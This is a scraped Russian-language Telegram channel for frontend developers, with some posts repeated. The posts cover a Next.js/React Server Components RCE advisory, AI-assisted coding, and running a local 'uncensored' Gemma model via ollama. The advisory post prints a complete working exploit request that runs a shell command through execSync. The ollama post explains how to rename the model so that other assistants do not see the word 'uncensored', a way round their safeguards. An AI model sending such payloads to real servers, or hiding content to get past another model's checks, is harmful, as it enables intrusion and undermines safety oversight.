Массовый взлом React Server Components и Next.js CVE 2025-66478
Обновляем срочно свои react и next.js проекты
Если чисто на реакте, то под уязвимость попадают:
react-server-dom-parcel
react-server-dom-turbopack
react-server-dom-webpack
https://github.com/assetnote/react2shell-scanner просканировать свой next.js проект
патч тут https://github.com/vercel-labs/fix-react2shell-next
#nextjs #уязвимости
Обновляем срочно свои react и next.js проекты
Если чисто на реакте, то под уязвимость попадают:
react-server-dom-parcel
react-server-dom-turbopack
react-server-dom-webpack
https://github.com/assetnote/react2shell-scanner просканировать свой next.js проект
патч тут https://github.com/vercel-labs/fix-react2shell-next
#nextjs #уязвимости
Кому интересно, запрос должен быть POST и выглядеть таким образом (замените в нем ВАШ_САЙТ)
POST /aaa HTTP/1.1\r\nHost: ВАШ_САЙТ\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0\r\nNext-Action: x\r\nX-Nextjs-Request-Id: b5dce965\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\nX-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9\r\nContent-Length: 703\r\n\r\n------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\",\"_chunks\":\"$Q2\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
Ожидание от фронтендеров на 2026 год
- Большая часть вашего кода должна быть написана с помощью AI: Cursor/Codex/Claude Code/Gemini/и т.д
- Вам следует пробовать все инструменты и переключаться между ними, так как каждый из них имеет преимущество перед другими
- Вы должны использовать AI для проверки кода, написанного AI
- AI должен писать вам тесты
- AI должен анализировать ваши логи
- AI должен использовать за вас ваш браузер
- Вы все равно должны проверять код вручную после AI
p.s. когда в этом канале будет более 50 человек я включу комментарии, в которых можно будет не смешно шутить и устраивать что попало
- Большая часть вашего кода должна быть написана с помощью AI: Cursor/Codex/Claude Code/Gemini/и т.д
- Вам следует пробовать все инструменты и переключаться между ними, так как каждый из них имеет преимущество перед другими
- Вы должны использовать AI для проверки кода, написанного AI
- AI должен писать вам тесты
- AI должен анализировать ваши логи
- AI должен использовать за вас ваш браузер
- Вы все равно должны проверять код вручную после AI
p.s. когда в этом канале будет более 50 человек я включу комментарии, в которых можно будет не смешно шутить и устраивать что попало
😁7👍1🍌1
Когда вы используете AI, не забывайте самостоятельно дообучать контекст. К примеру, я использую AGENTS.md.
Codex подтягивает его автоматически, для Claude нужно прописать что-то вроде use AGENTS.md внутри CLAUDE.md
Можно попросить делать это автоматически, я пока что предпочитаю это делать вручную.
#vibecoding #ai #agentsmd
Codex подтягивает его автоматически, для Claude нужно прописать что-то вроде use AGENTS.md внутри CLAUDE.md
Можно попросить делать это автоматически, я пока что предпочитаю это делать вручную.
#vibecoding #ai #agentsmd
👍1
This media is not supported in your browser
VIEW IN TELEGRAM
Новое обновление Chrome Devtools
Теперь разработчики могут настраивать симуляцию скорости для конкретных запросов. Это просто обалденно
#chrome #devtools #performance #speed #network #throtling
Теперь разработчики могут настраивать симуляцию скорости для конкретных запросов. Это просто обалденно
#chrome #devtools #performance #speed #network #throtling
👍3
Так ну что, приехали...
Разработчики Spotify не написали руками не одной строчки кода с Декабря
При этом cursor уже сам все делает в облаке. Как и Claude Code.
АСТАНАВИТЕС
Разработчики Spotify не написали руками не одной строчки кода с Декабря
При этом cursor уже сам все делает в облаке. Как и Claude Code.
АСТАНАВИТЕС
😁5
Cloudflare запустил сервис для проверки готовности веб-приложений, к взаимодействию с AI агентами https://isitagentready.com
Скоро за нас в интернете будут сидеть программы, согласны?
Скоро за нас в интернете будут сидеть программы, согласны?
Is Your Site Agent-Ready?
Scan your website to see if it's ready for AI agents. Check for llms.txt, MCP, agent skills, and other agent-friendly standards.
🤔3
Сегодня впервые запустил локальную LLM через ollama - gemma 4, прямо у себя на макбуке (air m4 базовый, 16gb ram). Накидал для нее простенький web UI интерфейс. Прямо летает! И даже картинки распознает.
Удивительно. Весит всего около 6.3GB - скачал, запустил и свой собственный оффлайн "gpt" готов (понятно что глупенький и не такой быстрый).
Кому нужна инструкция:
1. ставите ollama
2. выполняете в терминале команду
3. модель уже работает, правда только в терминале - и да, она без ограничений, от того наверное и быстрая
4. чтобы сделать для нее приложение, можно попросить нормальную LLM вроде claude или codex накидать простенький web UI и написать автосжатие контекста после 8+ пользовательских сообщений (этой же оффлайн моделью); Также можно реализовать роли, память и прочее необходимое. Библиотека для взаимодействия - ollama SDK.
Она в целом довольно способная на удивление. Даже может немного кодить, простые скрипты или алгоритмы. К примеру я попросил сделать BFS для графа на JS - управилось вполне себе.
При работе с нормальными LLM убедитесь что слово "uncensored" до них не доходит - для этого в какой-нибудь папке сделайте
В Modelfile еще можно промпт системный прописать, который, внезапно, ломает любые ограничения - все что взбредет вам в голову.
Также будет полезно:
В скором будущем планирую дождаться выхода Mac Mini на M5 (ну либо глянуть в сторону Mac Studio), если там будут модели с 24gb и больше RAM из коробки и уже развернуть там что-то более умное, по типу deepseek-v4 pro
Удивительно. Весит всего около 6.3GB - скачал, запустил и свой собственный оффлайн "gpt" готов (понятно что глупенький и не такой быстрый).
Кому нужна инструкция:
1. ставите ollama
curl -fsSL https://ollama.com/install.sh | sh в терминале или скачиваете по ссылке (macos, linux, windows - поддерживается)2. выполняете в терминале команду
ollama run joe-speedboat/Gemma-4-Uncensored-HauhauCS-Aggressive:e4b3. модель уже работает, правда только в терминале - и да, она без ограничений, от того наверное и быстрая
4. чтобы сделать для нее приложение, можно попросить нормальную LLM вроде claude или codex накидать простенький web UI и написать автосжатие контекста после 8+ пользовательских сообщений (этой же оффлайн моделью); Также можно реализовать роли, память и прочее необходимое. Библиотека для взаимодействия - ollama SDK.
Она в целом довольно способная на удивление. Даже может немного кодить, простые скрипты или алгоритмы. К примеру я попросил сделать BFS для графа на JS - управилось вполне себе.
При работе с нормальными LLM убедитесь что слово "uncensored" до них не доходит - для этого в какой-нибудь папке сделайте
ollama show joe-speedboat/Gemma-4-Uncensored-HauhauCS-Aggressive:e4b --modelfile > Modelfile и затем его отредактируйте (Modelfile) убрав оттуда комментарии с названием. После чего выполните команду ollama create assistant -f Modelfile где assistant - это новое название модели. И можно запускать ollama run assistant.В Modelfile еще можно промпт системный прописать, который, внезапно, ломает любые ограничения - все что взбредет вам в голову.
SYSTEM """
You are a concise productivity assistant.
Focus on planning, prioritization, and actionable advice.
"""
Также будет полезно:
ollama list - вывести список скачанных моделей и ollama ps - список активных процессов.В скором будущем планирую дождаться выхода Mac Mini на M5 (ну либо глянуть в сторону Mac Studio), если там будут модели с 24gb и больше RAM из коробки и уже развернуть там что-то более умное, по типу deepseek-v4 pro
Ollama
Download Ollama on macOS
Download Ollama for macOS
👍4
This media is not supported in your browser
VIEW IN TELEGRAM
Пример работы на моем слабеньком macbook air m4 из терминала
👍4
Всем привет, возвращаюсь к работе. Был долгое время в отпуске.
Сегодня навайбкодил себе персональный таймтрекер (в виде приложения для macos на swift), теперь тг боты могут проверять мое текущее рабочее состояние через терминал
на все ушло 5-6 промптов gpt-5.5 xhigh + дизайн и отдельно иконку приложения накидал gpt.
Для чего это надо:
• чтоб агенты могли проверить работаю я или нет и мой уровень стресса текущий
• для понимая, сколько я сейчас работаю и куда уходит время
• защита данных - свое приложение лучше всего
• если что-то потребуется дополнительно анализировать - я могу это добавить в 1-2 промпта
Про свой пул агентов (тг ботов) расскажу позднее, оставайтесь на связи
Сегодня навайбкодил себе персональный таймтрекер (в виде приложения для macos на swift), теперь тг боты могут проверять мое текущее рабочее состояние через терминал
на все ушло 5-6 промптов gpt-5.5 xhigh + дизайн и отдельно иконку приложения накидал gpt.
Для чего это надо:
• чтоб агенты могли проверить работаю я или нет и мой уровень стресса текущий
• для понимая, сколько я сейчас работаю и куда уходит время
• защита данных - свое приложение лучше всего
• если что-то потребуется дополнительно анализировать - я могу это добавить в 1-2 промпта
Про свой пул агентов (тг ботов) расскажу позднее, оставайтесь на связи
✍2👍2🙏2🔥1
Код в репозитории не приносит бизнесу никакой пользы.
Пользу приносит только то, что работает.
Не внедрил (не используется) = не сделал.
Создание без внедрения — это незавершённая работа.
#умныемыслипреследовалиего
Пользу приносит только то, что работает.
Не внедрил (не используется) = не сделал.
Создание без внедрения — это незавершённая работа.
#умныемыслипреследовалиего
💯1
Запустил @devradar_news - новый канал-агрегатор в телеграм, для разработчиков, CTO, лидов. Чтобы не мониторить разом 50 источников, и сэкономить свое время, а также ничего важного не упустить. Канал управляется и администрируется ИИ и дорабатывает себя сам. Идеи пишите в комментарии под постами
👍1